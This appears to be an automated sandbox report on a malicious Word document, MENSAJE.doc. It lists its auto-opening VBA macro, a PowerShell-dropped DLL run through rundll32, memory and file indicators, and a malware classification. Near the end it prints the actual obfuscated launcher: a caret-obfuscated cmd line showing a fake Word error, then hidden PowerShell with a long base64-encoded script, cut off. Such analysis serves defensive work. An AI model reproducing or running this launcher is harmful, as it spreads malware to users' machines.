                      Source: Screenshot number: 4Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 5,956 N@m 13 ;a 1009
                      Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G)
                      Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. a &1 @ O I @ 100% G) A GE)
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 0Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
                      Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
                      Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
                      Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
                      Source: Document image extraction number: 1Screenshot OCR: ENABLE CONTENT" buttons to preview this document
                      Powershell drops PE fileShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Liq8l58\Egok7ei\D64O.dllJump to dropped file
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5641
                      Source: unknownProcess created: Commandline size = 5540
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5540
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Sqnknlpyv\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017D7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100189F6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007605
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000620A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001F411
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000F813
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D013
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008816
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000421E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C424
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002628
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004A2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000DC2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018831
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10007E34
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A83A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000903F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014E4B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000704B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D44C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C04C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005856
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011259
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018668
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C07D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10014693
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CAA0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004EA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10008CA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001C6AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100056B3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015AB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100106C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009CC8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D2CB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000D0DE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10009AE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100142E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DEE8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100094EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000C6EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CF11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015115
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001231B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001BF25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DB25
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000492A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000213E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000CB42
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10016B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001654F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10018F65
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10012965
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001676B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10010F6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10011B71
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10017570
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000A176
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001DD78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10013D7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001E19F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100199A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10015DAA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001EDB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10006BC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100173C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100177C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10019DC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100193C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001CDCC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000ADCE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B1D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10004BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10005BE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002DEE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_100137F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1001B3FE
                      Source: MENSAJE.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Nre_13r__v1meabhr2, Function Document_open
                      Source: MENSAJE.docOLE indicator, VBA macros: true
                      Source: rundll32.exe, 00000006.00000002.2098421333.0000000001C60000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2097577001.0000000000950000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2108996769.00000000008B0000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2120167840.00000000021F0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@32/8@1/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ENSAJE.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBDB3.tmpJump to behavior
                      Source: MENSAJE.docOLE indicator, Word Document stream: true
                      Source: MENSAJE.docOLE document summary: title field not present or empty
                      Source: MENSAJE.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............O........................... .0.......0.............P.......................#...............................h.......5kU.............
                      Source: C:\Windows\System32\msg.exeConsole Write: ............O...l...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e...............L.......................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........Y.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................9..j......................u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................9..j..... u...............u.............}..v............0.N...............Y.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....@.......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......Y...............u.............}..v............0.N.............(.Y.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............i..j......................u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............i..j..... u...............u.............}..v............0.N.............x.Y.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7................3.j.....LY...............u.............}..v....p.......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7................2.j....(.................u.............}..v............0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C................3.j.....LY...............u.............}..v....p.......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C................2.j....(.................u.............}..v............0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O................3.j.....LY...............u.............}..v....p.......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O................2.j....(.................u.............}..v............0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v............0.N.............HIY.....(.......l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[................2.j....x.................u.............}..v............0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.9.2.............}..v............0.N.............HIY.....$.......l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....%......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....%................u.............}..v....@&......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....-......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....-................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....5......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....5................u.............}..v....@6......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....=......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....=................u.............}..v....@>......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....E......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....E................u.............}..v....@F......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....M......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....M................u.............}..v....@N......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....U......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....U................u.............}..v....@V......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....]......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....]................u.............}..v....@^......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....e......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....e................u.............}..v....@f......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....m......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....m................u.............}..v....@n......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v.....u......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j.....u................u.............}..v....@v......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................3.j.....LY...............u.............}..v.....}......0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'................2.j.....}................u.............}..v....@~......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....@.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............U.3.5.R.=.(.'.C.6.'.+.'.5.B.'.)...u.............}..v............0.N.............HIY..... .......l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v.... .......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v............0.N.............................l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v............0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................3.j.....LY...............u.............}..v....P.......0.N.....................r.......l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v............0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............ ........3.j.....LY...............u.............}..v............0.N.............HIY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................2.j......................u.............}..v....P.......0.N..............IY.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................u.............}..v....._......0.N...............Y.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....E.h...............u.............}..v....h.......0.N...............Y.............l...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Liq8l58\Egok7ei\D64O.dll AnyString
                      Source: MENSAJE.docVirustotal: Detection: 61%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAZQBUAC0AaQBUAEUAbQAgACgAIgB2AEEAUgBpACIAKwAiAGEAYgBMAGUAOgAwAGkAIgArACIAOQBmACIAKwAiAFoAYgAiACkAIAAgACgAIABbAFQAWQBwAEUAXQAoACIAewAxAH0AewAyAH0AewA0AH0AewA1AH0AewAwAH0AewAzAH0AewA2AH0AIgAgAC0ARgAgACcAVABPACcALAAnAFMAWQBTAFQAZQAnACwAJwBNAC4ASQBvAC4AZABpACcALAAnAFIAJwAsACcAcgBlACcALAAnAEMAJwAsACcAWQAnACkAIAAgACkAIAAgADsAIAAgACAAJAB5AHcATQA5AG4AIAA9AFsAdABZAFAARQBdACgAIgB7ADUAfQB7ADAAfQB7ADMAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwBuAEUAdAAuAHMAZQBSAFYAJwAsACcAZQBSACcALAAnAEkAbgBUACcALAAnAGkAQwBFAFAAbwAnACwAJwBtAGEATgBBAEcAJwAsACcAUwBZAHMAdABFAE0ALgAnACkAIAAgADsAIAAgACQAUwA0AGsANgB0AHIAagA9ACQATgA2ADkARwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQATwAyAF8AUAA7ACQARwAxADQAUQA9ACgAJwBVACcAKwAoACcAMwAnACsAJwA2AE4AJwApACkAOwAgACQAMABJADkAZgB6AGIAOgA6ACIAQwBSAGUAYQB0AGAARQBEAGkAcgBFAGAAYwBUAE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwAyAE8AYgBMACcAKwAnAGkAJwArACcAcQAnACkAKwAnADgAbAAnACsAJwA1ACcAKwAnADgAJwArACgAJwAyACcAKwAnAE8AYgBFAGcAJwApACsAKAAnAG8AJwArACcAawA3AGUAaQAnACkAKwAoACcAMgBPACcAKwAnAGIAJwApACkAIAAtAEMAUgBlAHAATABBAGMARQAgACgAWwBDAGgAQQBSAF0ANQAwACsAWwBDAGgAQQBSAF0ANwA5ACsAWwBDAGgAQQBSAF0AOQA4ACkALABbAEMAaABBAFIAXQA5ADIAKQApADsAJABPADIAXwBZAD0AKAAoACcAVAAnACsAJwAzADUAJwApACsAJwBEACcAKQA7ACAAKAAgACAAZwBDAGkAIAAgAFYAQQBSAEkAQQBiAGwARQA6AHkAdwBtADkATgAgACkALgBWAGEAbAB1AGUAOgA6ACIAUwBFAGMAdQByAGAAaQBUAFkAcABgAFIAbwB0AGAAbwBDAG8AbAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAUwA3ADcATgA9ACgAJwBBACcAKwAoACcAOAAxACcAKwAnAFcAJwApACkAOwAkAEcAcQBoADAAagBfAGIAIAA9ACAAKAAnAEQAJwArACgAJwA2ACcAKwAnADQATwAnACkAKQA7ACQAVwA4ADYATwA9ACgAKAAnAEMAJ